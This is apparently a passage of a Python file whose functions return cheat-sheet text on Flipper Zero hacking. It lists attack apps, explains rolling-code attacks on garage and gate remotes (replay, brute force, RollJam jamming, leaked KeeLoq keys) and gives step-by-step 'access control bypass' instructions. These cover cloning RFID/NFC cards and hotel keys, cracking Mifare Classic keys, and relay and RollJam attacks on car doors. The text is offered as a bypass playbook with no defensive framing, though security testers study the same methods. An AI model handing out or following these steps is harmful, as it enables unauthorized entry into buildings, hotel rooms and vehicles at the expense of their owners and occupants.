  - Cannot extract encrypted keys (AES-128)
  - Relay attack is main bypass method
"""

def flipper_apps_list():
    return """
ESSENTIAL FLIPPER APPS (App Store + External)

HACKING:
  WiFi Marauder   - ESP32 WiFi attacks (deauth, scan, PMKID)
  BLE Spam        - Flood Apple/Android/Samsung BLE popups
  Sub-GHz Bruteforcer - Brute force garage/gate remotes
  NFC Maker       - Create custom NFC tags (URLs, WiFi, vCard)
  Mifare Nested   - Advanced Mifare Classic key recovery
  RFID Fuzzer     - Fuzz RFID readers with random UIDs
  BadUSB + WiFi   - BadUSB with WiFi exfil via ESP32

TOOLS:
  Signal Generator - PWM/square wave on GPIO
  Logic Analyzer   - Decode UART/SPI/I2C/1-Wire
  UART Terminal    - Serial console over GPIO
  I2C Scanner      - Find I2C devices on bus
  SPI Mem Manager  - Read/write SPI flash chips
  Frequency Analyzer - Find unknown RF frequencies
  Spectrum Analyzer - Visual RF spectrum (with CC1101)

GAMES & FUN:
  Doom, Snake, Tetris, Flappy Bird, 2048
  Tamagotchi (Flipper has built-in virtual pet!)

CUSTOM FIRMWARE EXTRAS:
  Unleashed: Removes TX frequency restrictions
  Momentum: All unleashed features + extra apps + themes
  RogueMaster: Most apps pre-installed
"""

def rolling_code_info():
    return """
ROLLING CODE ATTACKS (Sub-GHz)

FIXED CODE (vulnerable):
  - Came, Nice FLO, Princeton, Linear, GateTX
  - Capture once  replay forever
  - Brute force: Try all codes (2^12 = 4096 for 12-bit)

ROLLING CODE (harder):
  - KeeLoq, Nice FlorS, Somfy, Chamberlain, LiftMaster
  - Each press generates new code using PRNG
  - Simple replay does NOT work

ROLLING CODE ATTACKS:
  1. RollJam:
     - Jam + capture code 1  user presses again  capture code 2
     - Replay code 1, save code 2 for later
     - Needs: Flipper + jammer (or 2 Flippers)

  2. Rolljam v2 (with Marauder):
     - Automated jam + capture via ESP32

  3. Key Extraction:
     - If manufacturer key is known, can predict future codes
     - Some KeeLoq keys leaked online

  4. Time-based (Somfy):
     - Somfy uses time window
     - Captured code valid for short period

ON FLIPPER (Unleashed/Momentum):
  Sub-GHz  Read  Wait for signal
  Sub-GHz  Saved  Send (for fixed codes)
  Sub-GHz  Extra  Frequency Analyzer (find freq first)
"""

def access_control_bypass():
    return """
ACCESS CONTROL BYPASS (Flipper Zero)

RFID (125kHz) - EM4100 / HID ProxCard:
  1. Read: RFID  Read  Hold Flipper to card
  2. Save & Emulate: Acts as the card
  3. Write: Clone to T5577 blank card
  4. Brute force: Try common facility codes

NFC (13.56MHz) - Mifare / DESFire / iClass:
  1. Read: NFC  Detect Reader  Hold to reader
  2. Mifare Classic: Dictionary attack  nested  darkside
  3. Emulate: Saved card via NFC  Saved  Emulate
  4. Write: Clone to Magic Gen1a/Gen2 card

HOTEL KEYS:
  Most hotels use Mifare Classic 1K
  Read  crack keys  full dump  emulate
  Some hotels use Ultralight-C (harder)

GARAGE / GATE:
  Sub-GHz  Frequency Analyzer  Find freq
  Sub-GHz  Read  Capture code
  If fixed code: Replay. If rolling: RollJam attack.

ELEVATOR:
  Most use RFID/NFC cards  clone with Flipper
  Some use iButton  clone with Flipper
  Physical: IR sensor bypass with IR blaster

CAR DOORS:
  315/433 MHz rolling code  RollJam attack
  Relay attack: Extend key fob range with 2 devices
  Tesla: 2.4 GHz BLE  need different tools
"""
